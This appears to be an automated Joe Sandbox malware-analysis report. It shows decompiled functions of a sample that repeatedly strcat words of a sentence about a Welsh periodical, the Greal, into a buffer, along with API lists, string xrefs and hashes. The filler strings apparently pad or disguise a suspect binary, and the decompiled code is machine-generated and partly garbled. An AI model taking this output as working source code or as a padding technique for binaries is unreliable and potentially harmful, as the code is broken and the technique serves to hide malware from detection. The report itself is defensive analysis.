String ID: (Llangollen)$1852$19th-century$Greal$Llangollen$Welsh-language$William$Williams$first$periodical$published$was
API String ID: 517398557-3946822944
Opcode ID: 0db0bd11164765b123269a05de4362ed4b4bff91299da2a751e58abaaf5d6c66
Instruction ID: 1300b8be5ecf9517a9bf16cf9a7700731417ccfcf37e2c6ae00ebab3ec0fba90
Opcode Fuzzy Hash: 0db0bd11164765b123269a05de4362ed4b4bff91299da2a751e58abaaf5d6c66
Instruction Fuzzy Hash: E52190B69C021C6ACB20B7B4DD49ECE77ECAF44701F11C5A2E645E2054EA789686CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040E5DE Relevance: 43.6, APIs: 17, Strings: 12, Instructions: 77
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040E5DE() {
				char* _t56;
				void* _t58;
				void* _t59;
				char* _t60;
				void* _t61;
				void* _t65;

				asm("sbb eax, [ecx]");
				strcat(_t61 - 0x81c, ??);
				strcat(_t61 - 0x81c, "Greal");
				strcat(_t61 - 0x81c, "(Llangollen)");
				strcat(_t61 - 0x81c, "was");
				strcat(_t61 - 0x81c, "a");
				strcat(_t61 - 0x81c, "19th-century");
				strcat(_t61 - 0x81c, "Welsh-language");
				strcat(_t61 - 0x81c, "periodical");
				strcat(_t61 - 0x81c, "first");
				strcat(_t61 - 0x81c, "published");
				strcat(_t61 - 0x81c, "by");
				strcat(_t61 - 0x81c, "William");
				strcat(_t61 - 0x81c, "Williams");
				strcat(_t61 - 0x81c, _t56);
				strcat(_t61 - 0x81c, "Llangollen");
				strcat(_t61 - 0x81c, _t56);
				strcat(_t61 - 0x81c, _t60);
				_pop(_t58);
				if(_t65 != 0 && _t65 == 0) {
				}
				E0040D22A(_t58, _t59, _t65); // executed
				_push("The");
			}

0x0040e5de
0x0040e5e8
0x0040e5f6
0x0040e604
0x0040e612
0x0040e620
0x0040e62e
0x0040e63c
0x0040e64a
0x0040e65b
0x0040e669
0x0040e677
0x0040e685
0x0040e693
0x0040e69d
0x0040e6ab
0x0040e6b5
0x0040e6c2
0x0040e6c5
0x0040e6c6
0x0040e6c6
0x0040e6cb
0x0040e6d6

APIs

strcat.MSVCRT(?,The), ref: 0040E5E8
strcat.MSVCRT(?,Greal), ref: 0040E5F6
strcat.MSVCRT(?,(Llangollen)), ref: 0040E604
strcat.MSVCRT(?,was), ref: 0040E612
strcat.MSVCRT(?,00411C18), ref: 0040E620
strcat.MSVCRT(?,19th-century), ref: 0040E62E
strcat.MSVCRT(?,Welsh-language), ref: 0040E63C
strcat.MSVCRT(?,periodical), ref: 0040E64A
strcat.MSVCRT(?,first), ref: 0040E65B
strcat.MSVCRT(?,published), ref: 0040E669
strcat.MSVCRT(?,00411C5C), ref: 0040E677
strcat.MSVCRT(?,William), ref: 0040E685
strcat.MSVCRT(?,Williams), ref: 0040E693
strcat.MSVCRT(?,00411C74), ref: 0040E69D
strcat.MSVCRT(?,Llangollen), ref: 0040E6AB
strcat.MSVCRT(?,00411C74), ref: 0040E6B5
strcat.MSVCRT(?,1852), ref: 0040E6C2
strcat.MSVCRT(?,The), ref: 0040E6DC
strcat.MSVCRT(?,Greal), ref: 0040E6EA
strcat.MSVCRT(?,(Llangollen)), ref: 0040E6F8
strcat.MSVCRT(?,was), ref: 0040E706
strcat.MSVCRT(?,00411C18), ref: 0040E714
strcat.MSVCRT(?,19th-century), ref: 0040E722
strcat.MSVCRT(?,Welsh-language), ref: 0040E730
strcat.MSVCRT(?,periodical), ref: 0040E73E
strcat.MSVCRT(?,first), ref: 0040E74F
strcat.MSVCRT(?,published), ref: 0040E75D
strcat.MSVCRT(?,00411C5C), ref: 0040E76B
strcat.MSVCRT(?,William), ref: 0040E779
strcat.MSVCRT(?,Williams), ref: 0040E787
strcat.MSVCRT(?,00411C74), ref: 0040E791
strcat.MSVCRT(?,Llangollen), ref: 0040E79F
strcat.MSVCRT(?,00411C74), ref: 0040E7A9
strcat.MSVCRT(?,1852), ref: 0040E7B6
CloseHandle.KERNEL32(?), ref: 0040E7BD
ExitProcess.KERNEL32 ref: 0040E7C5

Strings

first, xrefs: 0040E655
(Llangollen), xrefs: 0040E5FE
Llangollen, xrefs: 0040E6A5
19th-century, xrefs: 0040E628
1852, xrefs: 0040E6C0
Welsh-language, xrefs: 0040E636
published, xrefs: 0040E663
Williams, xrefs: 0040E68D
periodical, xrefs: 0040E644
William, xrefs: 0040E67F
Greal, xrefs: 0040E5F0
was, xrefs: 0040E60C

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: strcat$CloseExitHandleProcess
String ID: (Llangollen)$1852$19th-century$Greal$Llangollen$Welsh-language$William$Williams$first$periodical$published$was
API String ID: 517398557-3946822944
Opcode ID: 3815ba182fff5e78ea49be9bba95649088e1a492ad12f7682d5baa638c3af429
Instruction ID: a08f3ab59285b0d14feaf67869ffbcdf3e3e86f471b0f8ec0957e3a427d1dd11
Opcode Fuzzy Hash: 3815ba182fff5e78ea49be9bba95649088e1a492ad12f7682d5baa638c3af429
Instruction Fuzzy Hash: A021C2B69C021C65CB20B7A4DD45ECE73FCBF54700F11C9A2E645E2055EA789A87CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0040E261 Relevance: 43.6, APIs: 17, Strings: 12, Instructions: 76
stringCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040E261() {
				char* _t18;
				char* _t55;
				char* _t58;
				void* _t59;
				void* _t63;

				asm("sbb eax, [ecx]");
				strcat(_t18, ??);
				strcat(_t59 - 0x81c, "Greal");
				strcat(_t59 - 0x81c, "(Llangollen)");
				strcat(_t59 - 0x81c, "was");
				strcat(_t59 - 0x81c, "a");
				strcat(_t59 - 0x81c, "19th-century");
				strcat(_t59 - 0x81c, "Welsh-language");
				strcat(_t59 - 0x81c, "periodical");
				strcat(_t59 - 0x81c, "first");
				strcat(_t59 - 0x81c, "published");
				strcat(_t59 - 0x81c, "by");
				strcat(_t59 - 0x81c, "William");
				strcat(_t59 - 0x81c, "Williams");
				strcat(_t59 - 0x81c, _t55);
				strcat(_t59 - 0x81c, "Llangollen");
				strcat(_t59 - 0x81c, _t55);
				strcat(_t59 - 0x81c, _t58);
				if(_t63 != 0 && _t63 == 0) {
				}
				E0040111D(); // executed
				_push("The");
			}

0x0040e261
0x0040e265
0x0040e273
0x0040e281
0x0040e28f
0x0040e29d
0x0040e2ab
0x0040e2b9
0x0040e2c7
0x0040e2d8
0x0040e2e6
0x0040e2f4
0x0040e302
0x0040e310
0x0040e31a
0x0040e328
0x0040e332
0x0040e33f
0x0040e343
0x0040e343
0x0040e348
0x0040e353

APIs

strcat.MSVCRT(?,The), ref: 0040E265
strcat.MSVCRT(?,Greal), ref: 0040E273
strcat.MSVCRT(?,(Llangollen)), ref: 0040E281
strcat.MSVCRT(?,was), ref: 0040E28F
strcat.MSVCRT(?,00411C18), ref: 0040E29D
strcat.MSVCRT(?,19th-century), ref: 0040E2AB
strcat.MSVCRT(?,Welsh-language), ref: 0040E2B9
strcat.MSVCRT(?,periodical), ref: 0040E2C7
strcat.MSVCRT(?,first), ref: 0040E2D8
strcat.MSVCRT(?,published), ref: 0040E2E6
strcat.MSVCRT(?,00411C5C), ref: 0040E2F4
strcat.MSVCRT(?,William), ref: 0040E302
strcat.MSVCRT(?,Williams), ref: 0040E310
strcat.MSVCRT(?,00411C74), ref: 0040E31A
strcat.MSVCRT(?,Llangollen), ref: 0040E328
strcat.MSVCRT(?,00411C74), ref: 0040E332
strcat.MSVCRT(?,1852), ref: 0040E33F
strcat.MSVCRT(?,The), ref: 0040E359
strcat.MSVCRT(?,Greal), ref: 0040E367
strcat.MSVCRT(?,(Llangollen)), ref: 0040E375
strcat.MSVCRT(?,was), ref: 0040E383
strcat.MSVCRT(?,00411C18), ref: 0040E391
strcat.MSVCRT(?,19th-century), ref: 0040E39F
strcat.MSVCRT(?,Welsh-language), ref: 0040E3AD
strcat.MSVCRT(?,periodical), ref: 0040E3BB
strcat.MSVCRT(?,first), ref: 0040E3CC
strcat.MSVCRT(?,published), ref: 0040E3DA
strcat.MSVCRT(?,00411C5C), ref: 0040E3E8
strcat.MSVCRT(?,William), ref: 0040E3F6
strcat.MSVCRT(?,Williams), ref: 0040E404
strcat.MSVCRT(?,00411C74), ref: 0040E40E
strcat.MSVCRT(?,Llangollen), ref: 0040E41C
strcat.MSVCRT(?,00411C74), ref: 0040E426
strcat.MSVCRT(?,1852), ref: 0040E433
OpenEventA.KERNEL32(001F0003,00000000,?,00414048,00000000,00414048,00000000), ref: 0040E4CA
CreateEventA.KERNEL32(00000000,00000000,00000000,?), ref: 0040E4DA
strcat.MSVCRT(?,The), ref: 0040E4EF
strcat.MSVCRT(?,Greal), ref: 0040E4FD
strcat.MSVCRT(?,(Llangollen)), ref: 0040E50B
strcat.MSVCRT(?,was), ref: 0040E519
strcat.MSVCRT(?,00411C18), ref: 0040E527
strcat.MSVCRT(?,19th-century), ref: 0040E535
strcat.MSVCRT(?,Welsh-language), ref: 0040E543
strcat.MSVCRT(?,periodical), ref: 0040E551
strcat.MSVCRT(?,first), ref: 0040E562
strcat.MSVCRT(?,published), ref: 0040E570
strcat.MSVCRT(?,00411C5C), ref: 0040E57E
strcat.MSVCRT(?,William), ref: 0040E58C
strcat.MSVCRT(?,Williams), ref: 0040E59A
strcat.MSVCRT(?,00411C74), ref: 0040E5A4
strcat.MSVCRT(?,Llangollen), ref: 0040E5B2
strcat.MSVCRT(?,00411C74), ref: 0040E5BC
strcat.MSVCRT(?,1852), ref: 0040E5CE

Strings

first, xrefs: 0040E2D2
(Llangollen), xrefs: 0040E27B
Llangollen, xrefs: 0040E322
19th-century, xrefs: 0040E2A5
1852, xrefs: 0040E33D
Welsh-language, xrefs: 0040E2B3
published, xrefs: 0040E2E0
Williams, xrefs: 0040E304
periodical, xrefs: 0040E2C1
William, xrefs: 0040E2FC
Greal, xrefs: 0040E26D
was, xrefs: 0040E289

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: strcat$Event$CreateOpen
String ID: (Llangollen)$1852$19th-century$Greal$Llangollen$Welsh-language$William$Williams$first$periodical$published$was
API String ID: 3181953660-3946822944
Opcode ID: 82c1fb25ec5f38fa8533be41a72612319490d30028f5155bf05df1cac63913d4
Instruction ID: e483dac6a6a860fa1ab044cebf2dc9a7ba0d589e68f28f28344bd830d74aa361
Opcode Fuzzy Hash: 82c1fb25ec5f38fa8533be41a72612319490d30028f5155bf05df1cac63913d4
Instruction Fuzzy Hash: 272190B69C021C65CB20B7A49D45ECE73FCAF44700F11C5A2F645E2055EA789A878FA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040E16D Relevance: 43.6, APIs: 17, Strings: 12, Instructions: 76
stringCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040E16D() {
				char* _t18;
				char* _t55;
				char* _t58;
				void* _t59;
				void* _t63;

				asm("sbb eax, [ecx]");
				strcat(_t18, ??);
				strcat(_t59 - 0x81c, "Greal");
				strcat(_t59 - 0x81c, "(Llangollen)");
				strcat(_t59 - 0x81c, "was");
				strcat(_t59 - 0x81c, "a");
				strcat(_t59 - 0x81c, "19th-century");
				strcat(_t59 - 0x81c, "Welsh-language");
				strcat(_t59 - 0x81c, "periodical");
				strcat(_t59 - 0x81c, "first");
				strcat(_t59 - 0x81c, "published");
				strcat(_t59 - 0x81c, "by");
				strcat(_t59 - 0x81c, "William");
				strcat(_t59 - 0x81c, "Williams");
				strcat(_t59 - 0x81c, _t55);
				strcat(_t59 - 0x81c, "Llangollen");
				strcat(_t59 - 0x81c, _t55);
				strcat(_t59 - 0x81c, _t58);
				if(_t63 != 0 && _t63 == 0) {
				}
				E004010B1();
				_push("The");
			}

0x0040e16d
0x0040e171
0x0040e17f
0x0040e18d
0x0040e19b
0x0040e1a9
0x0040e1b7
0x0040e1c5
0x0040e1d3
0x0040e1e4
0x0040e1f2
0x0040e200
0x0040e20e
0x0040e21c
0x0040e226
0x0040e234
0x0040e23e
0x0040e24b
0x0040e24f
0x0040e24f
0x0040e254
0x0040e25f

APIs

strcat.MSVCRT(?,The), ref: 0040E171
strcat.MSVCRT(?,Greal), ref: 0040E17F
strcat.MSVCRT(?,(Llangollen)), ref: 0040E18D
strcat.MSVCRT(?,was), ref: 0040E19B
strcat.MSVCRT(?,00411C18), ref: 0040E1A9
strcat.MSVCRT(?,19th-century), ref: 0040E1B7
strcat.MSVCRT(?,Welsh-language), ref: 0040E1C5
strcat.MSVCRT(?,periodical), ref: 0040E1D3
strcat.MSVCRT(?,first), ref: 0040E1E4
strcat.MSVCRT(?,published), ref: 0040E1F2
strcat.MSVCRT(?,00411C5C), ref: 0040E200
strcat.MSVCRT(?,William), ref: 0040E20E
strcat.MSVCRT(?,Williams), ref: 0040E21C
strcat.MSVCRT(?,00411C74), ref: 0040E226
strcat.MSVCRT(?,Llangollen), ref: 0040E234
strcat.MSVCRT(?,00411C74), ref: 0040E23E
strcat.MSVCRT(?,1852), ref: 0040E24B
strcat.MSVCRT(?,The), ref: 0040E265
strcat.MSVCRT(?,Greal), ref: 0040E273
strcat.MSVCRT(?,(Llangollen)), ref: 0040E281
strcat.MSVCRT(?,was), ref: 0040E28F
strcat.MSVCRT(?,00411C18), ref: 0040E29D
strcat.MSVCRT(?,19th-century), ref: 0040E2AB
strcat.MSVCRT(?,Welsh-language), ref: 0040E2B9
strcat.MSVCRT(?,periodical), ref: 0040E2C7
strcat.MSVCRT(?,first), ref: 0040E2D8
strcat.MSVCRT(?,published), ref: 0040E2E6
strcat.MSVCRT(?,00411C5C), ref: 0040E2F4
strcat.MSVCRT(?,William), ref: 0040E302
strcat.MSVCRT(?,Williams), ref: 0040E310
strcat.MSVCRT(?,00411C74), ref: 0040E31A
strcat.MSVCRT(?,Llangollen), ref: 0040E328
strcat.MSVCRT(?,00411C74), ref: 0040E332
strcat.MSVCRT(?,1852), ref: 0040E33F

Strings

first, xrefs: 0040E1DE
(Llangollen), xrefs: 0040E187
Llangollen, xrefs: 0040E22E
19th-century, xrefs: 0040E1B1
1852, xrefs: 0040E249
Welsh-language, xrefs: 0040E1BF
published, xrefs: 0040E1EC
Williams, xrefs: 0040E216
periodical, xrefs: 0040E1CD
William, xrefs: 0040E208
Greal, xrefs: 0040E179
was, xrefs: 0040E195

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: strcat
String ID: (Llangollen)$1852$19th-century$Greal$Llangollen$Welsh-language$William$Williams$first$periodical$published$was
API String ID: 2416929390-3946822944
Opcode ID: 3c5693bc8142fb425d3e2e2306e60e604fff3641e47a8f7f4355d99535499840
Instruction ID: 7bf848e4b65d993b4a82e6e16342fc71b140c360cd70cf87117d4e844a0e5e25
Opcode Fuzzy Hash: 3c5693bc8142fb425d3e2e2306e60e604fff3641e47a8f7f4355d99535499840
Instruction Fuzzy Hash: EF21A1B69C021C65CB20F7A49D45ECE73FCBF54700F11C5A2E645E2054EA789A86CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040E079 Relevance: 43.6, APIs: 17, Strings: 12, Instructions: 76
stringCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040E079() {
				char* _t18;
				char* _t55;
				char* _t58;
				void* _t59;
				void* _t63;

				asm("sbb eax, [ecx]");
				strcat(_t18, ??);
				strcat(_t59 - 0x81c, "Greal");
				strcat(_t59 - 0x81c, "(Llangollen)");
				strcat(_t59 - 0x81c, "was");
				strcat(_t59 - 0x81c, "a");
				strcat(_t59 - 0x81c, "19th-century");
				strcat(_t59 - 0x81c, "Welsh-language");
				strcat(_t59 - 0x81c, "periodical");
				strcat(_t59 - 0x81c, "first");
				strcat(_t59 - 0x81c, "published");
				strcat(_t59 - 0x81c, "by");
				strcat(_t59 - 0x81c, "William");
				strcat(_t59 - 0x81c, "Williams");
				strcat(_t59 - 0x81c, _t55);
				strcat(_t59 - 0x81c, "Llangollen");
				strcat(_t59 - 0x81c, _t55);
				strcat(_t59 - 0x81c, _t58);
				if(_t63 != 0 && _t63 == 0) {
				}
				E0040D8BD();
				_push("The");
			}

0x0040e079
0x0040e07d
0x0040e08b
0x0040e099
0x0040e0a7
0x0040e0b5
0x0040e0c3
0x0040e0d1
0x0040e0df
0x0040e0f0
0x0040e0fe
0x0040e10c
0x0040e11a
0x0040e128
0x0040e132
0x0040e140
0x0040e14a
0x0040e157
0x0040e15b
0x0040e15b
0x0040e160
0x0040e16b

APIs

strcat.MSVCRT(?,The), ref: 0040E07D
strcat.MSVCRT(?,Greal), ref: 0040E08B
strcat.MSVCRT(?,(Llangollen)), ref: 0040E099
strcat.MSVCRT(?,was), ref: 0040E0A7
strcat.MSVCRT(?,00411C18), ref: 0040E0B5
strcat.MSVCRT(?,19th-century), ref: 0040E0C3
strcat.MSVCRT(?,Welsh-language), ref: 0040E0D1
strcat.MSVCRT(?,periodical), ref: 0040E0DF
strcat.MSVCRT(?,first), ref: 0040E0F0
strcat.MSVCRT(?,published), ref: 0040E0FE
strcat.MSVCRT(?,00411C5C), ref: 0040E10C
strcat.MSVCRT(?,William), ref: 0040E11A
strcat.MSVCRT(?,Williams), ref: 0040E128
strcat.MSVCRT(?,00411C74), ref: 0040E132
strcat.MSVCRT(?,Llangollen), ref: 0040E140
strcat.MSVCRT(?,00411C74), ref: 0040E14A
strcat.MSVCRT(?,1852), ref: 0040E157
strcat.MSVCRT(?,The), ref: 0040E171
strcat.MSVCRT(?,Greal), ref: 0040E17F
strcat.MSVCRT(?,(Llangollen)), ref: 0040E18D
strcat.MSVCRT(?,was), ref: 0040E19B
strcat.MSVCRT(?,00411C18), ref: 0040E1A9
strcat.MSVCRT(?,19th-century), ref: 0040E1B7
strcat.MSVCRT(?,Welsh-language), ref: 0040E1C5
strcat.MSVCRT(?,periodical), ref: 0040E1D3
strcat.MSVCRT(?,first), ref: 0040E1E4
strcat.MSVCRT(?,published), ref: 0040E1F2
strcat.MSVCRT(?,00411C5C), ref: 0040E200
strcat.MSVCRT(?,William), ref: 0040E20E
strcat.MSVCRT(?,Williams), ref: 0040E21C
strcat.MSVCRT(?,00411C74), ref: 0040E226
strcat.MSVCRT(?,Llangollen), ref: 0040E234
strcat.MSVCRT(?,00411C74), ref: 0040E23E
strcat.MSVCRT(?,1852), ref: 0040E24B

Strings

first, xrefs: 0040E0E4
(Llangollen), xrefs: 0040E093
Llangollen, xrefs: 0040E13A
19th-century, xrefs: 0040E0BD
1852, xrefs: 0040E155
Welsh-language, xrefs: 0040E0CB
published, xrefs: 0040E0F8
Williams, xrefs: 0040E122
periodical, xrefs: 0040E0D9
William, xrefs: 0040E114
Greal, xrefs: 0040E085
was, xrefs: 0040E0A1

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: strcat
String ID: (Llangollen)$1852$19th-century$Greal$Llangollen$Welsh-language$William$Williams$first$periodical$published$was
API String ID: 2416929390-3946822944
Opcode ID: 98b8f69889328549b7f76efa3086b1fd936ed9845c40e29af950586679eec092
Instruction ID: 6bdafe4cfd2be860d8fb6cd3531ac322ae341866c24e27ee0d169da90db90d0d
Opcode Fuzzy Hash: 98b8f69889328549b7f76efa3086b1fd936ed9845c40e29af950586679eec092
Instruction Fuzzy Hash: 492190B69C021C6ACB20B7B49D45ECE73FCAF44700F11C9A2E645E2055EA789A878F94

Uniqueness

Uniqueness Score: -1.00%

Function 0040DF85 Relevance: 43.6, APIs: 17, Strings: 12, Instructions: 76
stringCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040DF85() {
				char* _t18;
				char* _t55;
				char* _t58;
				void* _t59;
				void* _t63;

				asm("sbb eax, [ecx]");
				strcat(_t18, ??);
				strcat(_t59 - 0x81c, "Greal");
				strcat(_t59 - 0x81c, "(Llangollen)");
				strcat(_t59 - 0x81c, "was");
				strcat(_t59 - 0x81c, "a");
				strcat(_t59 - 0x81c, "19th-century");
				strcat(_t59 - 0x81c, "Welsh-language");
				strcat(_t59 - 0x81c, "periodical");
				strcat(_t59 - 0x81c, "first");
				strcat(_t59 - 0x81c, "published");
				strcat(_t59 - 0x81c, "by");
				strcat(_t59 - 0x81c, "William");
				strcat(_t59 - 0x81c, "Williams");
				strcat(_t59 - 0x81c, _t55);
				strcat(_t59 - 0x81c, "Llangollen");
				strcat(_t59 - 0x81c, _t55);
				strcat(_t59 - 0x81c, _t58);
				if(_t63 != 0 && _t63 == 0) {
				}
				E004010E1();
				_push("The");
			}

0x0040df85
0x0040df89
0x0040df97
0x0040dfa5
0x0040dfb3
0x0040dfc1
0x0040dfcf
0x0040dfdd
0x0040dfeb
0x0040dffc
0x0040e00a
0x0040e018
0x0040e026
0x0040e034
0x0040e03e
0x0040e04c
0x0040e056
0x0040e063
0x0040e067
0x0040e067
0x0040e06c
0x0040e077

APIs

strcat.MSVCRT(?,The), ref: 0040DF89
strcat.MSVCRT(?,Greal), ref: 0040DF97
strcat.MSVCRT(?,(Llangollen)), ref: 0040DFA5
strcat.MSVCRT(?,was), ref: 0040DFB3
strcat.MSVCRT(?,00411C18), ref: 0040DFC1
strcat.MSVCRT(?,19th-century), ref: 0040DFCF
strcat.MSVCRT(?,Welsh-language), ref: 0040DFDD
strcat.MSVCRT(?,periodical), ref: 0040DFEB
strcat.MSVCRT(?,first), ref: 0040DFFC
strcat.MSVCRT(?,published), ref: 0040E00A
strcat.MSVCRT(?,00411C5C), ref: 0040E018
strcat.MSVCRT(?,William), ref: 0040E026
strcat.MSVCRT(?,Williams), ref: 0040E034
strcat.MSVCRT(?,00411C74), ref: 0040E03E
strcat.MSVCRT(?,Llangollen), ref: 0040E04C
strcat.MSVCRT(?,00411C74), ref: 0040E056
strcat.MSVCRT(?,1852), ref: 0040E063
strcat.MSVCRT(?,The), ref: 0040E07D
strcat.MSVCRT(?,Greal), ref: 0040E08B
strcat.MSVCRT(?,(Llangollen)), ref: 0040E099
strcat.MSVCRT(?,was), ref: 0040E0A7
strcat.MSVCRT(?,00411C18), ref: 0040E0B5
strcat.MSVCRT(?,19th-century), ref: 0040E0C3
strcat.MSVCRT(?,Welsh-language), ref: 0040E0D1
strcat.MSVCRT(?,periodical), ref: 0040E0DF
strcat.MSVCRT(?,first), ref: 0040E0F0
strcat.MSVCRT(?,published), ref: 0040E0FE
strcat.MSVCRT(?,00411C5C), ref: 0040E10C
strcat.MSVCRT(?,William), ref: 0040E11A
strcat.MSVCRT(?,Williams), ref: 0040E128
strcat.MSVCRT(?,00411C74), ref: 0040E132
strcat.MSVCRT(?,Llangollen), ref: 0040E140
strcat.MSVCRT(?,00411C74), ref: 0040E14A
strcat.MSVCRT(?,1852), ref: 0040E157

Strings

first, xrefs: 0040DFF6
(Llangollen), xrefs: 0040DF9F
Llangollen, xrefs: 0040E046
19th-century, xrefs: 0040DFC9
1852, xrefs: 0040E061
Welsh-language, xrefs: 0040DFD1
published, xrefs: 0040E004
Williams, xrefs: 0040E02E
periodical, xrefs: 0040DFE5
William, xrefs: 0040E020
Greal, xrefs: 0040DF91
was, xrefs: 0040DFAD

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: strcat
String ID: (Llangollen)$1852$19th-century$Greal$Llangollen$Welsh-language$William$Williams$first$periodical$published$was
API String ID: 2416929390-3946822944
Opcode ID: ed6315302e91f9a2d48b8a659e0018c93c29ef06aa3eb27f24e899f90a81db5b
Instruction ID: ee4b6f9caaa72cfd03d9d0b6e6b92922226abd2c38f89ea125772c3c4b4c01da
Opcode Fuzzy Hash: ed6315302e91f9a2d48b8a659e0018c93c29ef06aa3eb27f24e899f90a81db5b
Instruction Fuzzy Hash: E221A1B69C021CA5CB20B7B49D45ECE73FCBF44700F11C5A2E645E2054EA789A86CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040DE91 Relevance: 43.6, APIs: 17, Strings: 12, Instructions: 76
stringCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040DE91() {
				char* _t18;
				char* _t55;
				char* _t58;
				void* _t59;
				void* _t63;

				asm("sbb eax, [ecx]");
				strcat(_t18, ??);
				strcat(_t59 - 0x81c, "Greal");
				strcat(_t59 - 0x81c, "(Llangollen)");
				strcat(_t59 - 0x81c, "was");
				strcat(_t59 - 0x81c, "a");
				strcat(_t59 - 0x81c, "19th-century");
				strcat(_t59 - 0x81c, "Welsh-language");
				strcat(_t59 - 0x81c, "periodical");
				strcat(_t59 - 0x81c, "first");
				strcat(_t59 - 0x81c, "published");
				strcat(_t59 - 0x81c, "by");
				strcat(_t59 - 0x81c, "William");
				strcat(_t59 - 0x81c, "Williams");
				strcat(_t59 - 0x81c, _t55);
				strcat(_t59 - 0x81c, "Llangollen");
				strcat(_t59 - 0x81c, _t55);
				strcat(_t59 - 0x81c, _t58);
				if(_t63 != 0 && _t63 == 0) {
				}
				E00401091(); // executed
				_push("The");
			}

0x0040de91
0x0040de95
0x0040dea3
0x0040deb1
0x0040debf
0x0040decd
0x0040dedb
0x0040dee9
0x0040def7
0x0040df08
0x0040df16
0x0040df24
0x0040df32
0x0040df40
0x0040df4a
0x0040df58
0x0040df62
0x0040df6f
0x0040df73
0x0040df73
0x0040df78
0x0040df83

APIs

strcat.MSVCRT(?,The), ref: 0040DE95
strcat.MSVCRT(?,Greal), ref: 0040DEA3
strcat.MSVCRT(?,(Llangollen)), ref: 0040DEB1
strcat.MSVCRT(?,was), ref: 0040DEBF
strcat.MSVCRT(?,00411C18), ref: 0040DECD
